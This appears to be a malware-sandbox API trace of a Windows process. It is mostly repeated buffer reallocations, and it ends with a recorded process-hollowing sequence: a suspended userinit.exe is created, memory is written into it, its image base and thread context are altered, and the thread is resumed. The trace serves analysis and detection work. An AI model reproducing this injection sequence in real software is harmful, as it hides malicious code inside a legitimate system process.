[0147.759] GlobalUnlock (hMem=0x189000c) returned 0
[0147.759] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0147.759] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.760] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.760] GlobalUnlock (hMem=0x189000c) returned 0
[0147.760] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0147.760] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.761] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.761] GlobalUnlock (hMem=0x189000c) returned 0
[0147.761] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0147.761] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.762] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.762] GlobalUnlock (hMem=0x189000c) returned 0
[0147.762] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0147.762] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.763] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.763] GlobalUnlock (hMem=0x189000c) returned 0
[0147.763] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0147.763] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.764] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.764] GlobalUnlock (hMem=0x189000c) returned 0
[0147.764] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0147.764] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.765] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.765] GlobalUnlock (hMem=0x189000c) returned 0
[0147.765] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0147.765] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.766] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.766] GlobalUnlock (hMem=0x189000c) returned 0
[0147.766] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0147.766] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.767] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.767] GlobalUnlock (hMem=0x189000c) returned 0
[0147.767] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0147.767] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.767] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.767] GlobalUnlock (hMem=0x189000c) returned 0
[0147.767] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0147.768] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.768] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.768] GlobalUnlock (hMem=0x189000c) returned 0
[0147.768] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0147.768] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.769] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.769] GlobalUnlock (hMem=0x189000c) returned 0
[0147.769] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0147.769] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.770] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.770] GlobalUnlock (hMem=0x189000c) returned 0
[0147.770] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0147.770] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.771] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.771] GlobalUnlock (hMem=0x189000c) returned 0
[0147.771] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0147.771] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.772] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.772] GlobalUnlock (hMem=0x189000c) returned 0
[0147.772] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0147.772] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.773] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.773] GlobalUnlock (hMem=0x189000c) returned 0
[0147.773] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0147.773] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.774] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.774] GlobalUnlock (hMem=0x189000c) returned 0
[0147.774] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0147.774] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.775] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.775] GlobalUnlock (hMem=0x189000c) returned 0
[0147.775] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0147.775] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.776] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.776] GlobalUnlock (hMem=0x189000c) returned 0
[0147.776] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0147.776] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.777] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.777] GlobalUnlock (hMem=0x189000c) returned 0
[0147.777] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0147.777] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.777] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.777] GlobalUnlock (hMem=0x189000c) returned 0
[0147.778] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0147.778] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.778] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.778] GlobalUnlock (hMem=0x189000c) returned 0
[0147.778] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0147.778] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.779] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x114, hThread=0x118, dwProcessId=0x734, dwThreadId=0x524)) returned 1
[0147.783] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0147.783] GetThreadContext (in: hThread=0x118, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdb000, Edx=0x0, Ecx=0x0, Eax=0x3f2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x18fd08, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0147.783] ReadProcessMemory (in: hProcess=0x114, lpBaseAddress=0x7ffdb008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0147.783] VirtualAllocEx (hProcess=0x114, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0147.784] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1b10000
[0147.784] VirtualAlloc (lpAddress=0x1b10000, dwSize=0x54000, flAllocationType=0x1000, flProtect=0x4) returned 0x1b10000
[0147.785] VirtualAlloc (lpAddress=0x1b00000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1b00000
[0147.792] WriteProcessMemory (in: hProcess=0x114, lpBaseAddress=0x400000, lpBuffer=0x1affca8*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1affca8*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0147.808] WriteProcessMemory (in: hProcess=0x114, lpBaseAddress=0x7ffdb008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0147.808] SetThreadContext (hThread=0x118, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdb000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x18fd08, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0147.809] ResumeThread (hThread=0x118) returned 0x1
[0147.809] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0147.809] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.809] GlobalUnlock (hMem=0x189000c) returned 0
[0147.809] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
